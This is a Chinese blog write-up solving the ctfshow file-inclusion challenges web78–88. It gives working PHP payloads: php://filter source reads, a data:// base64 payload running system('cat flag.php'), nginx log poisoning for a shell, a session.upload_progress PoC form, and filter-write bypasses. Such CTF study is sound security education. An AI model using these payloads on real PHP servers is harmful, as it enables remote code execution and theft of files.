ctfshow web入门 78-88的文件包含

最新推荐文章于 2024-07-04 14:42:56 发布
最新推荐文章于 2024-07-04 14:42:56 发布
阅读量4.1k 收藏 9
点赞数 5
分类专栏: 文件包含 ctfshow 文章标签: 文件包含 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/108669794
版权

1. web78

PHP伪协议读取

?file=php://filter/convert.base64-encode/resource=flag.php

2. web79

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

然后查看源代码

3. web80-81

包含日志文件 进行getshell

日志文件路径:?file=/var/log/nginx/access.log

在这里插入图片描述

在这里插入图片描述

4. web82-86

利用session.upload_progress进行文件包含

这道题有点像wmctf的make php great again

利用session对话进行文件包含利用

对那道题自己的总结

#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

5. web87

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

php://filter/write=string.rot13/resource=2.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

原因可能是因为php版本太高了这个过滤器不让用了

使用base64绕过

php://filter/write=convert.base64-decode/resource=3.php

通过url双编码

%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30

因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码

在这里插入图片描述

在这里插入图片描述

6. web88

发现过滤的还是比较多,但是没有过滤:那我们就可以使用PHP伪协议就是

这里使用的是data://text/plain;base64,poc 其实和79差不多

只是注意的是编码成base64的时候要去掉
在这里插入图片描述

base64的内容是 <?php system('cat fl0g.php'); ?>

Firebasky
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow 文件包含 web88
Kradress的博客
12-12 764
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-17 02:27:25 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow文件包含web87-117
m0_62207170的博客
06-19 465
ctfshow文件包含web87-117
ctfshow-web入门-文件包含web78web79、web80、web81)
最新发布
Welcome To Myon'Blog !
07-04 1522
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2560
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
文件包含&CTFshow78-117关
m0_63917373的博客
11-08 662
CTFSHOW 文件包含
CTFshow web入门web88-文件包含11
weixin_74336671的博客
12-06 150
没有过滤:,可以使用php伪协议。
ctfshow-web78(文件包含)
m0_62094846的博客
01-11 1262
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow-web41~60-WP
02-21
CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 ##...
ctfshow学习记录-web入门文件包含78-87)
龟速更新的九某人
07-04 1719
ctfshow学习记录-web入门文件包含web78-87)
CG CTF-Web-文件包含
feng的博客
09-05 303
WP 由于题目比较简单,不扯什么心路历程了,直接上WP。 首先看到题目就知道是文件包含,即使题目没有明说,点击链接。 发现了?file=show.php。 也需要知道这大概率就是文件包含了。我因为之前有个题目看到这样的没有察觉,导致跑偏了。既然错过了一次,就要吸取经验。 知道了文件包含,就利用文件包含相关的知识点去解题。 我首先用了php://input,结果出了Oh, on。我以为是过滤了php:,所以我换了一种协议: data://text/plain,<?php system("ls /")
CTFshow 文件包含 78-88&116-117
Landasika的博客
05-17 1128
目录 web78web79web80方法一、http://远程包含方法二、include包含日志web81web82-86:条件竞争web87*web88web116web117 web78 if(isset($_GET['file'])){ $file=$_GET['file']; include($file); }else{ highlight_file...
CTFshow_web入门_文件包含(web78~web88)
monster663的博客
02-02 1003
web78 直接包含,如果不知道就去学习一下什么是文件包含 ?file=php://filter/read=convert.base64-encode/resource=flag.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__);
CTFshow_web入门_文件包含_web78-
weixin_43896504的博客
07-22 406
文件包含
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3038
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
CTFSHOW WEB入门 文件包含 web78-
sinat_41572027的博客
07-11 823
CTFSHOW WEB入门 文件包含 web78.79.80.81.87.88.116.117
ctfshow web入门文件包含
05-24
我不确定你在问什么,但如果你是在问CTF中的Web入门题目,它可能包含以下内容: 1. 源代码:包含了网站的HTML、CSS和JavaScript代码,以及后端服务器脚本代码。 2. Robots.txt文件:该文件包含网站的爬虫指令,告诉...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值